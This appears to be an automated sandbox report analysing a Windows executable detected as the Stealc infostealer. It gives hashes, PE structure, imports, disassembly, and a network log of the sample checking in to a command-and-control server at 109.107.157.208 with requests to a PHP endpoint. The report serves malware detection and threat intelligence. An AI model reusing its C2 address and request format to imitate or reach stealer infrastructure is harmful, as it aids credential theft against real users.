                                      renamed because original name is a hash value
                                      Original Sample Name:ca46940f226cad8c3123f7505fcad8a7.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@2/5@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 23
                                      • Number of non-executed functions: 170
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: hi2jR57Z15.exe
                                      TimeTypeDescription
                                      15:32:20API Interceptor1x Sleep call for process: WerFault.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      109.107.157.208is65NMeWkV.exeGet hashmaliciousStealcBrowse
                                      • 109.107.157.208/49aaa1bd4c594849.php
                                      T220UXIoKO.exeGet hashmaliciousStealc, VidarBrowse
                                      • 109.107.157.208/49aaa1bd4c594849.php
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPLis65NMeWkV.exeGet hashmaliciousStealcBrowse
                                      • 109.107.157.208
                                      T220UXIoKO.exeGet hashmaliciousStealc, VidarBrowse
                                      • 109.107.157.208
                                      arm5.elfGet hashmaliciousUnknownBrowse
                                      • 178.235.230.100
                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                      • 178.235.82.120
                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                      • 78.88.71.211
                                      jade.x86.elfGet hashmaliciousMiraiBrowse
                                      • 95.160.85.220
                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                      • 78.88.9.121
                                      nuklear.arm.elfGet hashmaliciousUnknownBrowse
                                      • 93.105.146.207
                                      eLSH927bGM.elfGet hashmaliciousUnknownBrowse
                                      • 93.105.146.209
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 93.105.223.164
                                      No context
                                      No context
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.9628972304147243
                                      Encrypted:false
                                      SSDEEP:96:hoTSsl6EsyhsI7pnmQXIDcQUpc6UMcEacw3q+HbHg/PB6HeaOy1EaGHh4vXNtZrZ:qTsE/0czAvjGcZrP2KzuiFyZ24IO8f
                                      MD5:FC5344A34734B49EA67F67F9835AA481
                                      SHA1:2DB85B90AE82FF4D0A317A9649CD48002F209A51
                                      SHA-256:3DEDB0FE60E6F6A3ABCB50F14688750D3762099C1E1C6CFB490FB6B628F0B460
                                      SHA-512:4FB653CB1EE559FDBE0E1EE65BA31BC3600C6F272A0594CD32DBD08E0DCD09CD026D956C0B35C7E8B09F285CA756FBECAF22B92F0ADBF79F53BBE78FFC56C638
                                      Malicious:true
                                      Reputation:low
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.2.7.1.9.2.0.5.1.3.3.3.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.2.7.1.9.2.1.1.2.2.7.0.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.3.3.c.3.8.1.-.6.c.3.3.-.4.e.1.5.-.9.e.c.9.-.f.6.c.d.5.7.f.e.6.4.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.9.6.c.8.a.5.-.5.a.4.1.-.4.2.c.1.-.a.4.e.7.-.c.f.d.f.7.a.6.a.d.0.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.i.2.j.R.5.7.Z.1.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.6.c.-.0.0.0.1.-.0.0.1.4.-.c.5.0.7.-.a.1.6.3.4.b.2.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.5.c.5.2.2.5.d.c.e.8.c.2.6.e.6.b.3.6.b.7.9.1.d.6.4.4.8.1.e.f.2.0.0.0.0.f.f.f.f.!.0.0.0.0.3.d.b.9.d.7.3.4.4.2.4.f.6.8.1.d.2.4.d.3.0.7.b.b.5.1.1.7.c.f.c.e.b.3.9.b.0.f.d.4.!.h.i.2.j.R.5.7.Z.1.5...e.x.e.....T.a.r.g.e.t.A.p.p.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 24 19:32:00 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):63832
                                      Entropy (8bit):1.9308859427257732
                                      Encrypted:false
                                      SSDEEP:192:djcwXMnGO8Xbd1vOQOJwT88TcrRVHN9I04tveP3f52H9z7TSmZWmzDm6GmWblcs:1WnGOyfmQEpZRQI2p/lMmLGmWf
                                      MD5:96A28D920727CEC47490F07A0457947F
                                      SHA1:B2A50FD810DBF28F67AFB21433F9FC1483C75937
                                      SHA-256:74FA4633E4CDB6F05BC787557BFB07E0E39A8FF364DE188C6D9E781BB297753E
                                      SHA-512:B010569A79FE1EA66B2B2B79EFE5499E1691329E26F63AA7811B89CD10AE42241A1199AAE3023E17B4D9D6B6EACDFDAF0F6EEB6380BCB739828560509DFD6262
                                      Malicious:false
                                      Reputation:low
                                      Preview:MDMP..a..... ..........g............4...............<............*..........T.......8...........T............3..X.......................................................................................................eJ......H.......GenuineIntel............T.......l......g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8336
                                      Entropy (8bit):3.699909301552922
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJ6f6VF6Y9nSU9kfgmfVfMUpD/89bIEsfu4m:R6lXJS6VF6YtSU9kfgmfVfMZI3f4
                                      MD5:6953B7C33811D84245AE2E1B059FC2DD
                                      SHA1:4CE5F98DE5BFD17C14ECD287B91DC6C61DDE84BB
                                      SHA-256:0043C3E1F52D27537ED98D999A75B793A3BAE01417AD62C7B88FB3AA3EC2FAC7
                                      SHA-512:42937E10589DC94BEEFDD9746C0E1E8F048E0E425AB9E9465D0597EDBF8562ADF4918AF7ECB11BE29C64C2A4D7579FC16956A9ECCAC023DC10FE68931A726BA1
                                      Malicious:false
                                      Reputation:low
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.7.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4579
                                      Entropy (8bit):4.462543783835954
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsVJg77aI9uxWpW8VYX4Ym8M4JAk27FA+q8GBVFpNquEd:uIjfvI7Ig7VW1JjVpMuEd
                                      MD5:212847AFF86064F5428780E0953A0A85
                                      SHA1:343D33800BCBB7B220889E31BCC91D4542C3053C
                                      SHA-256:9B4D9527633A73300BC6C30C7F70D2D6D1C800D3121912FC931AE58C07518F6A
                                      SHA-512:072453ECF59484348BA72EFC2B054BC0E6C4E77AEA61934C14CB3A4122C35A0094C056FF935876C79148D078F09309B326D4B9DA9954D9763FC55A7D11C86E7E
                                      Malicious:false
                                      Reputation:low
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="557914" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:MS Windows registry file, NT/2000 or above
                                      Category:dropped
                                      Size (bytes):1835008
                                      Entropy (8bit):4.465445010191308
                                      Encrypted:false
                                      SSDEEP:6144:OIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbo:DXD94+WlLZMM6YFH7+o
                                      MD5:C9402D9A42C6A6DE6B8B8F339299ED82
                                      SHA1:8DB3D5811577847DF1AB073B3AAB2BBDCBB8DE96
                                      SHA-256:9C788ED48C1A9422E2F2EF67D13410FB51EF8AC8A6D42F2A22BD27A495E3AB5F
                                      SHA-512:6ACE9A24CC7AB3802785B964AC61537DF441AD92EC5B408C586DDBE415C26F3446039305D309B8DFFD01CD045671621E7EA544AAA348F30E370B3173D45AFFDA
                                      Malicious:false
                                      Reputation:low
                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..reK&..............................................................................................................................................................................................................................................................................................................................................s{eQ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.465653280437216
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:hi2jR57Z15.exe
                                      File size:404'480 bytes
                                      MD5:ca46940f226cad8c3123f7505fcad8a7
                                      SHA1:3db9d734424f681d24d307bb5117cfceb39b0fd4
                                      SHA256:db1209d9d0566e572841bb59895e676b434b9ee1bcbbd56c3d139c5e5d6de27a
                                      SHA512:24376bc3575ab298348bc853336a9d6eac12867c7fbd3b37bcc05b298519390b8a45eee1f93690d424c9014ef8badd03b767af2340c85a281290df0da45e79c5
                                      SSDEEP:6144:5bjL3/6bf6+WByiFsBsOmc9WtA7nqmBEcXAotQphiBfgCiH/k7YR0TW:JWfbWLFxOou7qmy8BQrKfNAW
                                      TLSH:2A84E1113A90F870C5620E304928E7E9397DBC329AD95D9B372C7F6F3C353919AA2716
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z...Z...Z...D...z...D...B...D.......}3.._...Z...'...D...[...D...[...D...[...RichZ...................PE..L......f...........
                                      Icon Hash:63396de961636e0f
                                      Entrypoint:0x403a78
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66058BB3 [Thu Mar 28 15:24:35 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:e9b1e1a6508eb820f939412398a8ad85
                                      Instruction
                                      call 00007F90D8E5FB19h
                                      jmp 00007F90D8E5B33Eh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      call 00007F90D8E5B4FCh
                                      xchg cl, ch
                                      jmp 00007F90D8E5B4E4h
                                      call 00007F90D8E5B4F3h
                                      fxch st(0), st(1)
                                      jmp 00007F90D8E5B4DBh
                                      fabs
                                      fld1
                                      mov ch, cl
                                      xor cl, cl
                                      jmp 00007F90D8E5B4D1h
                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                      fabs
                                      fxch st(0), st(1)
                                      fabs
                                      fxch st(0), st(1)
                                      fpatan
                                      or cl, cl
                                      je 00007F90D8E5B4C6h
                                      fldpi
                                      fsubrp st(1), st(0)
                                      or ch, ch
                                      je 00007F90D8E5B4C4h
                                      fchs
                                      ret
                                      fabs
                                      fld st(0), st(0)
                                      fld st(0), st(0)
                                      fld1
                                      fsubrp st(1), st(0)
                                      fxch st(0), st(1)
                                      fld1
                                      faddp st(1), st(0)
                                      fmulp st(1), st(0)
                                      ftst
                                      wait
                                      fstsw word ptr [ebp-000000A0h]
                                      wait
                                      test byte ptr [ebp-0000009Fh], 00000001h
                                      jne 00007F90D8E5B4C7h
                                      xor ch, ch
                                      fsqrt
                                      ret
                                      pop eax
                                      jmp 00007F90D8E5FCDFh
                                      fstp st(0)
                                      fld tbyte ptr [004497EAh]
                                      ret
                                      fstp st(0)
                                      or cl, cl
                                      je 00007F90D8E5B4CDh
                                      fstp st(0)
                                      fldpi
                                      or ch, ch
                                      je 00007F90D8E5B4C4h
                                      fchs
                                      ret
                                      fstp st(0)
                                      fldz
                                      or ch, ch
                                      je 00007F90D8E5B4B9h
                                      fchs
                                      ret
                                      fstp st(0)
                                      jmp 00007F90D8E5FCB5h
                                      fstp st(0)
                                      mov cl, ch
                                      jmp 00007F90D8E5B4C2h
                                      call 00007F90D8E5B48Eh
                                      jmp 00007F90D8E5FCC0h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      Programming Language:
                                      • [C++] VS2008 build 21022
                                      • [ASM] VS2008 build 21022
                                      • [ C ] VS2008 build 21022
                                      • [IMP] VS2005 build 50727
                                      • [RES] VS2008 build 21022
                                      • [LNK] VS2008 build 21022
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x478440x3c.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5b0000x13f30.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25f0000xa5c.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26a00x40.text
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x1a0.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x471ba0x4720043030ba6eaa2dc632b9d19d23ca5af51False0.734402460456942data7.018176331066259IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .data0x490000x1185c0x6000d8da888e68d2ec5425ff74140ed87072False0.07796223958333333Matlab v4 mat-file (little endian) n2, sparse, rows 0, columns 00.906752159931918IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x5b0000x203f300x140002a6d816c7f7201604e567e813f866e62unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x25f0000x14ac0x16002539f9ac57aa02e872be9f11a90c69d7False0.4108664772727273data3.981263757082881IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      BECUSABOKIBEVOHESIYOW0x651a00x136fASCII text, with very long lines (4975), with no line terminatorsTamilIndia0.5947738693467337
                                      BECUSABOKIBEVOHESIYOW0x651a00x136fASCII text, with very long lines (4975), with no line terminatorsTamilSri Lanka0.5947738693467337
                                      XUBONAVEGUCIZAKUFAMABAWADUJATA0x665100x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5879156423858196
                                      XUBONAVEGUCIZAKUFAMABAWADUJATA0x665100x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5879156423858196
                                      RT_CURSOR0x683a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                      RT_CURSOR0x692480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                      RT_CURSOR0x69af00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                      RT_CURSOR0x6a0880x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                      RT_CURSOR0x6a1b80xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                      RT_CURSOR0x6a2900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                      RT_CURSOR0x6b1380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                      RT_CURSOR0x6b9e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                      RT_CURSOR0x6bf780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                      RT_CURSOR0x6ce200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                      RT_CURSOR0x6d6c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                      RT_ICON0x5b8600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.538594470046083
                                      RT_ICON0x5b8600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.538594470046083
                                      RT_ICON0x5bf280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.40943983402489625
                                      RT_ICON0x5bf280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.40943983402489625
                                      RT_ICON0x5e4d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.44769503546099293
                                      RT_ICON0x5e4d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.44769503546099293
                                      RT_ICON0x5e9680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.36886993603411516
                                      RT_ICON0x5e9680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.36886993603411516
                                      RT_ICON0x5f8100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5130866425992779
                                      RT_ICON0x5f8100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5130866425992779
                                      RT_ICON0x600b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5841013824884793
                                      RT_ICON0x600b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5841013824884793
                                      RT_ICON0x607800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6502890173410405
                                      RT_ICON0x607800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6502890173410405
                                      RT_ICON0x60ce80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.462448132780083
                                      RT_ICON0x60ce80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.462448132780083
                                      RT_ICON0x632900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.475375234521576
                                      RT_ICON0x632900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.475375234521576
                                      RT_ICON0x643380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.45778688524590166
                                      RT_ICON0x643380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.45778688524590166
                                      RT_ICON0x64cc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5106382978723404
                                      RT_ICON0x64cc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5106382978723404
                                      RT_DIALOG0x6deb80x58data0.8977272727272727
                                      RT_STRING0x6df100x374dataTamilIndia0.46945701357466063
                                      RT_STRING0x6df100x374dataTamilSri Lanka0.46945701357466063
                                      RT_STRING0x6e2880x2aedataTamilIndia0.478134110787172
                                      RT_STRING0x6e2880x2aedataTamilSri Lanka0.478134110787172
                                      RT_STRING0x6e5380x4e8dataTamilIndia0.4434713375796178
                                      RT_STRING0x6e5380x4e8dataTamilSri Lanka0.4434713375796178
                                      RT_STRING0x6ea200x510dataTamilIndia0.42746913580246915
                                      RT_STRING0x6ea200x510dataTamilSri Lanka0.42746913580246915
                                      RT_ACCELERATOR0x683480x58dataTamilIndia0.7954545454545454
                                      RT_ACCELERATOR0x683480x58dataTamilSri Lanka0.7954545454545454
                                      RT_GROUP_CURSOR0x6a0580x30data0.9375
                                      RT_GROUP_CURSOR0x6a2680x22data1.0588235294117647
                                      RT_GROUP_CURSOR0x6bf480x30data0.9375
                                      RT_GROUP_CURSOR0x6dc300x30data0.9375
                                      RT_GROUP_ICON0x5e9380x30dataTamilIndia0.9375
                                      RT_GROUP_ICON0x5e9380x30dataTamilSri Lanka0.9375
                                      RT_GROUP_ICON0x651280x76dataTamilIndia0.6694915254237288
                                      RT_GROUP_ICON0x651280x76dataTamilSri Lanka0.6694915254237288
                                      RT_VERSION0x6dc600x254data0.535234899328859
                                      DLLImport
                                      KERNEL32.dllTlsGetValue, GlobalCompact, CreateProcessW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, SetComputerNameW, SetVolumeMountPointW, GetComputerNameW, FreeEnvironmentStringsA, GetTickCount, GetCommConfig, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsW, SetFileShortNameW, LoadLibraryW, ReadConsoleInputA, GetVersionExW, GlobalMemoryStatus, GetTimeFormatW, GetModuleFileNameW, GetShortPathNameA, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, CreateNamedPipeA, SetFileAttributesA, LoadLibraryA, GetNumberFormatW, OpenJobObjectW, SetEnvironmentVariableA, GetCurrentDirectoryA, OpenEventW, LCMapStringW, CommConfigDialogW, GetFileAttributesA, GetTempFileNameW, HeapAlloc, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                      GDI32.dllGetCharWidth32A
                                      Language of compilation systemCountry where language is spokenMap
                                      TamilIndia
                                      TamilSri Lanka
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-24T21:32:00.378062+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730109.107.157.20880TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 24, 2024 21:31:59.056291103 CEST4973080192.168.2.4109.107.157.208
                                      Oct 24, 2024 21:31:59.061780930 CEST8049730109.107.157.208192.168.2.4
                                      Oct 24, 2024 21:31:59.061901093 CEST4973080192.168.2.4109.107.157.208
                                      Oct 24, 2024 21:31:59.062047958 CEST4973080192.168.2.4109.107.157.208
                                      Oct 24, 2024 21:31:59.067648888 CEST8049730109.107.157.208192.168.2.4
                                      Oct 24, 2024 21:31:59.922451973 CEST8049730109.107.157.208192.168.2.4
                                      Oct 24, 2024 21:31:59.922538996 CEST4973080192.168.2.4109.107.157.208
                                      Oct 24, 2024 21:31:59.928415060 CEST4973080192.168.2.4109.107.157.208
                                      Oct 24, 2024 21:31:59.935246944 CEST8049730109.107.157.208192.168.2.4
                                      Oct 24, 2024 21:32:00.377867937 CEST8049730109.107.157.208192.168.2.4
                                      Oct 24, 2024 21:32:00.378062010 CEST4973080192.168.2.4109.107.157.208
                                      Oct 24, 2024 21:32:05.295001030 CEST8049730109.107.157.208192.168.2.4
                                      Oct 24, 2024 21:32:05.299534082 CEST4973080192.168.2.4109.107.157.208
                                      Oct 24, 2024 21:32:23.296772957 CEST4973080192.168.2.4109.107.157.208
                                      • 109.107.157.208
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449730109.107.157.208807276C:\Users\user\Desktop\hi2jR57Z15.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 21:31:59.062047958 CEST90OUTGET / HTTP/1.1
                                      Host: 109.107.157.208
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 24, 2024 21:31:59.922451973 CEST203INHTTP/1.1 200 OK
                                      Date: Thu, 24 Oct 2024 19:31:59 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Oct 24, 2024 21:31:59.928415060 CEST419OUTPOST /49aaa1bd4c594849.php HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAF
                                      Host: 109.107.157.208
                                      Content-Length: 217
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
